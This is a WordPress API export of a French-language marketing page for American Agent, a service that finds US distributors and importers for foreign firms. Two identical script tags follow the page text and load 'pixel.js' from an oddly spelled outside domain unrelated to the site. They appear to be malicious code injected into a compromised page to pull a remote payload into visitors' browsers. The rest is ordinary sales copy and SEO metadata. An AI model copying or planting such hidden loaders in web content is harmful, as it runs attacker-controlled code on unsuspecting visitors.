{"id":3140,"date":"2014-08-16T07:17:06","date_gmt":"2014-08-16T07:17:06","guid":{"rendered":"https:\/\/americanagent.com\/usa-distributor-search-2\/"},"modified":"2014-09-18T10:07:39","modified_gmt":"2014-09-18T14:07:39","slug":"recherche-de-distributeurs-et-importateurs-americains","status":"publish","type":"page","link":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/","title":{"rendered":"Recherche de distributeurs et importateurs am\u00e9ricains"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-a8af6fcf62a6b3383d5d8830b6367e49\">\n#top .av-special-heading.av-av_heading-a8af6fcf62a6b3383d5d8830b6367e49{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-a8af6fcf62a6b3383d5d8830b6367e49 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-a8af6fcf62a6b3383d5d8830b6367e49 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-a8af6fcf62a6b3383d5d8830b6367e49 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains.<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-5423793a0e82d2455362b4eba580b48d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p style=\"color: #000000;\"><span style=\"color: #000000;\">Vous \u00eates une entreprise avec une gamme de produits techniques et complexes, ou vos services apr\u00e8s-ventes exigent un soutien local \u2026 de nombreuse de raisons qui expliquent pourquoi American Agent est votre partenaire privil\u00e9gi\u00e9 pour identifier l&#8217;importateur, le grossiste, le revendeur ou tout simplement le partenaire am\u00e9ricain qu&#8217;il vous faut.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">American Agent est l\u00e0 pour vous aider. Nous pouvons vous positionner d&#8217;une fa\u00e7on forte devant des partenaires am\u00e9ricains potentiels. Depuis 2002, nous avons \u00e9tabli des partenariats commerciaux entre plus de 100 entreprises avec des soci\u00e9t\u00e9s am\u00e9ricaines.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">Nous approchons et vous pr\u00e9sentons aux entreprises \u00e9tablies de bonne r\u00e9putation dans votre secteur d&#8217;activit\u00e9 ou votre fili\u00e8re. Nous nous assurons que l&#8217;entreprise est g\u00e9r\u00e9e par des dirigeants qui comprennent votre industrie et vos produits, et tout aussi important nous cherchons des entreprises aux \u00e9quipes de vente motiv\u00e9es avec lesquelles \u00e9tablir des accords les plus productifs et efficacies.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">En quoi et comment pouvons-nous vous aider\u00a0:<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">(1) Identifier tous les acteurs de votre secteur d&#8217;activit\u00e9 industriel ou technique. De nombreuses industries am\u00e9ricaines nous connaissent d\u00e9j\u00e0 tr\u00e8s bien et nous pouvons approcher des soci\u00e9t\u00e9s cibles sans perdre de temps. Notre carnet d\u2019adresses d&#8217;entreprises cibles am\u00e9ricaines comprends entre 50-150 entreprises ou circuits de distribution.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">(2) Vous pr\u00e9senter \u00e0 l&#8217;interlocuteur ad\u00e9quat de chaque entreprise cible, g\u00e9n\u00e9ralement nos contacts sont plus hauts dirigeants, souvent propri\u00e9taires de chef de la direction ou de l&#8217;entreprise eux-m\u00eames.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">(3) R\u00e9aliser les man\u0153uvres d&#8217;approches de la part de votre entreprise, mesurer les niveaux d&#8217;int\u00e9r\u00eat et d&#8217;implication.<\/span><\/p>\n<p style=\"color: #000000;\"><span style=\"color: #000000;\">\u00c0 partir de ce moment-l\u00e0, chaque situation est unique, et c&#8217;est seulement apr\u00e8s avoir \u00e9tabli ces contacts initiaux, que nous pouvons avec vous, d\u00e9finir votre approche du march\u00e9 am\u00e9ricain\u00a0 quelles sont les compagnies sinc\u00e8rement int\u00e9ress\u00e9es pour travailler avec vous.<\/span><\/p>\n<p><span style=\"color: #000000;\">Alors que d&#8217;autres march\u00e9s deviennent de plus en plus risqu\u00e9s et de moins en moins responsifs \u2026 le march\u00e9 et l&#8217;\u00e9conomie des \u00c9tats-Unis reprend rapidement de sa sant\u00e9. Nous observons beaucoup de bons mouvements dans de nombreuses industries. Nous serions heureux de vous aider \u00e0 percer ce march\u00e9 tr\u00e8s difficile. Si vous avez plus d&#8217;int\u00e9r\u00eat pour mes services, s&#8217;il vous pla\u00eet n&#8217;h\u00e9sitez pas me contacter directement.<\/span><\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3140","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Recherche de distributeurs et importateurs am\u00e9ricains<\/title>\n<meta name=\"description\" content=\"Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains. Vendre aux \u00c9tats-Unis. Travailler avec des Revendeurs aux \u00c9tats-Unis\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Recherche de distributeurs et importateurs am\u00e9ricains\" \/>\n<meta property=\"og:description\" content=\"Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains. Vendre aux \u00c9tats-Unis. Travailler avec des Revendeurs aux \u00c9tats-Unis\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-18T14:07:39+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-distributeurs-et-importateurs-americains\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-distributeurs-et-importateurs-americains\\\/\",\"name\":\"Recherche de distributeurs et importateurs am\u00e9ricains\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:06+00:00\",\"dateModified\":\"2014-09-18T14:07:39+00:00\",\"description\":\"Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains. Vendre aux \u00c9tats-Unis. Travailler avec des Revendeurs aux \u00c9tats-Unis\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-distributeurs-et-importateurs-americains\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-distributeurs-et-importateurs-americains\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-distributeurs-et-importateurs-americains\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Recherche de distributeurs et importateurs am\u00e9ricains\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Recherche de distributeurs et importateurs am\u00e9ricains","description":"Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains. Vendre aux \u00c9tats-Unis. Travailler avec des Revendeurs aux \u00c9tats-Unis","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/","og_locale":"fr_FR","og_type":"article","og_title":"Recherche de distributeurs et importateurs am\u00e9ricains","og_description":"Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains. Vendre aux \u00c9tats-Unis. Travailler avec des Revendeurs aux \u00c9tats-Unis","og_url":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-18T14:07:39+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/","url":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/","name":"Recherche de distributeurs et importateurs am\u00e9ricains","isPartOf":{"@id":"https:\/\/americanagent.com\/fr\/#website"},"datePublished":"2014-08-16T07:17:06+00:00","dateModified":"2014-09-18T14:07:39+00:00","description":"Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains. Vendre aux \u00c9tats-Unis. Travailler avec des Revendeurs aux \u00c9tats-Unis","breadcrumb":{"@id":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Recherche de distributeurs et importateurs am\u00e9ricains"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/fr\/#website","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/comments?post=3140"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3140\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/media?parent=3140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}